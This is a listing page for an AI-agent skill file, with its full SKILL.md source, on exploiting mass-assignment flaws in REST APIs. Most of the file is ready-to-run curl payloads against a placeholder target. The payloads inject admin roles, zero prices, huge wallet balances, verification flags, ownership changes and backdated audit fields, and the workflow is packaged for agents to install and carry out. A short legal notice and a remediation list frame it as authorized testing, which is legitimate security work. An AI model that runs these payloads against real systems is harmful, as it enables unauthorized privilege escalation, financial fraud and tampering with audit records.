exploiting-mass-assignment-in-rest-apis

Discover and exploit mass assignment vulnerabilities in REST APIs to escalate privileges, modify restricted fields, and bypass authorization controls by injecting unexpected parameters in API requests.

16 stars

byplurigrid

View on GitHub Installation ↓

Best use case

exploiting-mass-assignment-in-rest-apis is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

Teams using exploiting-mass-assignment-in-rest-apis should expect a more consistent output, faster repeated execution, less prompt rewriting.

When to use this skill

You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

You only need a quick one-off answer and do not need a reusable workflow.
You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/exploiting-mass-assignment-in-rest-apis/SKILL.md --create-dirs "https://raw.githubusercontent.com/plurigrid/asi/main/plugins/asi/skills/exploiting-mass-assignment-in-rest-apis/SKILL.md"

Manual Installation

Download SKILL.md from GitHub
Place it in .claude/skills/exploiting-mass-assignment-in-rest-apis/SKILL.md inside your project
Restart your AI agent — it will auto-discover the skill

How exploiting-mass-assignment-in-rest-apis Compares

Feature / Agent	exploiting-mass-assignment-in-rest-apis	Standard Approach
Platform Support	Not specified	Limited / Varies
Context Awareness	High	Baseline
Installation Complexity	Unknown	N/A

Frequently Asked Questions

What does this skill do?

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# Exploiting Mass Assignment in REST APIs

## When to Use
- When testing REST APIs that accept JSON input for creating or updating resources
- During API security assessments of applications using ORM frameworks (Rails, Django, Laravel, Spring)
- When testing user registration, profile update, or account management endpoints
- During bug bounty hunting on applications with CRUD API operations
- When evaluating role-based access control implementation in API-driven applications

## Prerequisites
- Burp Suite or Postman for API request crafting and interception
- Understanding of ORM auto-binding behavior in common frameworks
- API documentation or endpoint discovery through reconnaissance
- Multiple user accounts with different privilege levels for testing
- Knowledge of common sensitive fields (role, isAdmin, verified, balance, price)
- Arjun or param-miner for hidden parameter discovery


> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

## Workflow

### Step 1 — Discover API Structure and Fields
```bash
# Examine API responses to identify all object fields
curl -H "Authorization: Bearer USER_TOKEN" http://target.com/api/users/me | jq .
# Response reveals fields: id, username, email, role, isAdmin, verified, balance

# Check API documentation for exposed schemas
curl http://target.com/api/docs
curl http://target.com/swagger.json
curl http://target.com/openapi.yaml

# Use Arjun for hidden parameter discovery
arjun -u http://target.com/api/users/me -m JSON -H "Authorization: Bearer USER_TOKEN"

# Examine create/update request body vs response body
# The response may contain more fields than the request sends
# Those extra fields are mass assignment candidates
```

### Step 2 — Test Privilege Escalation via Role Fields
```bash
# Inject role/admin fields in profile update
curl -X PUT http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"testuser","email":"test@test.com","role":"admin"}'

# Try common admin field names
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"isAdmin":true}'

curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"is_admin":true,"admin":true,"role":"superadmin","user_type":"admin","privilege_level":99}'

# Test during registration
curl -X POST http://target.com/api/register \
  -H "Content-Type: application/json" \
  -d '{"username":"newadmin","password":"pass123","email":"admin@evil.com","role":"admin","isAdmin":true}'
```

### Step 3 — Test Financial and Business Logic Fields
```bash
# Modify price or balance fields
curl -X POST http://target.com/api/orders \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id":1,"quantity":1,"price":0.01}'

# Modify account balance
curl -X PATCH http://target.com/api/wallet \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"balance":999999}'

# Modify discount or coupon fields
curl -X POST http://target.com/api/checkout \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"cart_id":123,"discount_percent":100,"coupon_code":"NONE"}'

# Modify subscription tier
curl -X PATCH http://target.com/api/subscription \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"plan":"enterprise","price":0}'
```

### Step 4 — Test Verification and Status Fields
```bash
# Bypass email verification
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"email_verified":true,"verified":true,"active":true}'

# Modify account status
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"status":"active","banned":false,"suspended":false}'

# Modify ownership/organization
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"organization_id":"target-org-uuid","team_id":"admin-team"}'
```

### Step 5 — Test Relationship and Foreign Key Manipulation
```bash
# Change resource ownership
curl -X PATCH http://target.com/api/documents/123 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"owner_id":"admin-user-id"}'

# Assign to different group/team
curl -X PATCH http://target.com/api/projects/456 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"team_id":"privileged-team","access_level":"write"}'

# Modify created_at/updated_at for audit log manipulation
curl -X PATCH http://target.com/api/entries/789 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"created_at":"2020-01-01","created_by":"other-user-id"}'
```

### Step 6 — Automate Mass Assignment Testing
```bash
# Use Burp Intruder with field names wordlist
# Wordlist of common mass assignment fields:
# role, admin, isAdmin, is_admin, user_type, privilege, level
# verified, email_verified, active, banned, suspended
# balance, credits, price, discount, plan, tier
# owner_id, organization_id, team_id, group_id

# Python automation script
python3 mass_assignment_tester.py \
  --url http://target.com/api/users/me \
  --method PATCH \
  --token "Bearer USER_TOKEN" \
  --fields-file mass_assignment_fields.txt

# Nuclei mass assignment templates
echo "http://target.com" | nuclei -t http/vulnerabilities/generic/mass-assignment.yaml
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| Mass Assignment | ORM auto-binding of request parameters to model attributes without restriction |
| Autobinding | Framework feature that maps HTTP parameters directly to object properties |
| Allowlist | Server-side list of permitted fields for update operations (strong_parameters in Rails) |
| Denylist | List of forbidden fields (less secure than allowlist approach) |
| Hidden Fields | Server-managed fields (role, balance) not shown in forms but accepted by API |
| DTO (Data Transfer Object) | Pattern using separate objects for input vs. database to prevent mass assignment |
| Parameter Pollution | Sending unexpected extra parameters alongside legitimate ones |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| Burp Suite | API request interception and parameter injection |
| Postman | API testing and collection-based mass assignment testing |
| Arjun | Hidden parameter discovery tool for API endpoints |
| param-miner | Burp extension for discovering hidden parameters |
| OWASP ZAP | Automated API scanning with parameter injection |
| swagger-codegen | Generate API clients from OpenAPI specs for testing |

## Common Scenarios

1. **Admin Privilege Escalation** — Inject `"role":"admin"` or `"isAdmin":true` in profile update to gain administrative access
2. **Price Manipulation** — Modify `price` or `discount` fields in order creation endpoints to purchase items at reduced cost
3. **Email Verification Bypass** — Set `email_verified:true` during registration or profile update to bypass verification requirements
4. **Account Takeover** — Modify `email` or `phone` fields to attacker-controlled values, then trigger password reset
5. **Subscription Upgrade** — Inject `plan:"enterprise"` in subscription update to gain premium features without payment

## Output Format

```
## Mass Assignment Vulnerability Report
- **Target**: http://target.com/api/users/me
- **Method**: PATCH
- **Framework**: Ruby on Rails (detected via X-Powered-By)

### Findings
| # | Endpoint | Injected Field | Original | Modified | Impact |
|---|----------|---------------|----------|----------|--------|
| 1 | PATCH /api/users/me | role | "user" | "admin" | Privilege Escalation |
| 2 | POST /api/orders | price | 99.99 | 0.01 | Financial Loss |
| 3 | PATCH /api/users/me | email_verified | false | true | Verification Bypass |

### Remediation
- Implement allowlist (strong_parameters) for all model update operations
- Use DTOs/ViewModels to decouple API input from database models
- Apply field-level authorization checks on sensitive attributes
- Log and alert on attempts to modify restricted fields
```

Related Skills

testing-api-for-mass-assignment-vulnerability

from plurigrid/asi

Tests APIs for mass assignment (auto-binding) vulnerabilities where clients can modify object properties they should not have access to by including additional parameters in API requests. The tester identifies writable endpoints, adds undocumented fields to request bodies (role, isAdmin, price, balance), and checks if the server binds these to the data model without filtering. Part of OWASP API3:2023 Broken Object Property Level Authorization. Activates for requests involving mass assignment testing, parameter binding abuse, auto-binding vulnerability, or API over-posting.

performing-api-fuzzing-with-restler

from plurigrid/asi

Uses Microsoft RESTler to perform stateful REST API fuzzing by automatically generating and executing test sequences that exercise API endpoints, discover producer-consumer dependencies between requests, and find security and reliability bugs. The tester compiles an OpenAPI specification into a RESTler fuzzing grammar, configures authentication, runs test/fuzz-lean/fuzz modes, and analyzes results for 500 errors, authentication bypasses, resource leaks, and payload injection vulnerabilities. Activates for requests involving API fuzzing, RESTler testing, stateful API testing, or automated API security scanning.

performing-active-directory-forest-trust-attack

from plurigrid/asi

Enumerate and audit Active Directory forest trust relationships using impacket for SID filtering analysis, trust key extraction, cross-forest SID history abuse detection, and inter-realm Kerberos ticket assessment.

implementing-immutable-backup-with-restic

from plurigrid/asi

Implements immutable backup strategy using restic with S3-compatible storage and object lock for ransomware-resistant data protection. Automates backup creation, integrity verification via restic check --read-data, snapshot retention policy enforcement, and restore testing. Integrates with AWS S3 Object Lock, MinIO, and Backblaze B2 for WORM (Write Once Read Many) storage that prevents backup deletion or encryption by ransomware actors.

implementing-aes-encryption-for-data-at-rest

from plurigrid/asi

AES (Advanced Encryption Standard) is a symmetric block cipher standardized by NIST (FIPS 197) used to protect classified and sensitive data. This skill covers implementing AES-256 encryption in GCM m

forester

from plurigrid/asi

Jon Sterling's forester tool for tending mathematical forests — syntax, escaping, verbatim, tree files, skill2tree conversion

exploiting-zerologon-vulnerability-cve-2020-1472

from plurigrid/asi

Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol to achieve domain controller compromise by resetting the machine account password to empty.

exploiting-websocket-vulnerabilities

from plurigrid/asi

Testing WebSocket implementations for authentication bypass, cross-site hijacking, injection attacks, and insecure message handling during authorized security assessments.

exploiting-vulnerabilities-with-metasploit-framework

from plurigrid/asi

The Metasploit Framework is the world's most widely used penetration testing platform, maintained by Rapid7. It contains over 2,300 exploits, 1,200 auxiliary modules, and 400 post-exploitation modules

exploiting-type-juggling-vulnerabilities

from plurigrid/asi

Exploit PHP type juggling vulnerabilities caused by loose comparison operators to bypass authentication, circumvent hash verification, and manipulate application logic through type coercion attacks.

exploiting-template-injection-vulnerabilities

from plurigrid/asi

Detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities across Jinja2, Twig, Freemarker, and other template engines to achieve remote code execution.

exploiting-sql-injection-with-sqlmap

from plurigrid/asi

Detecting and exploiting SQL injection vulnerabilities using sqlmap to extract database contents during authorized penetration tests.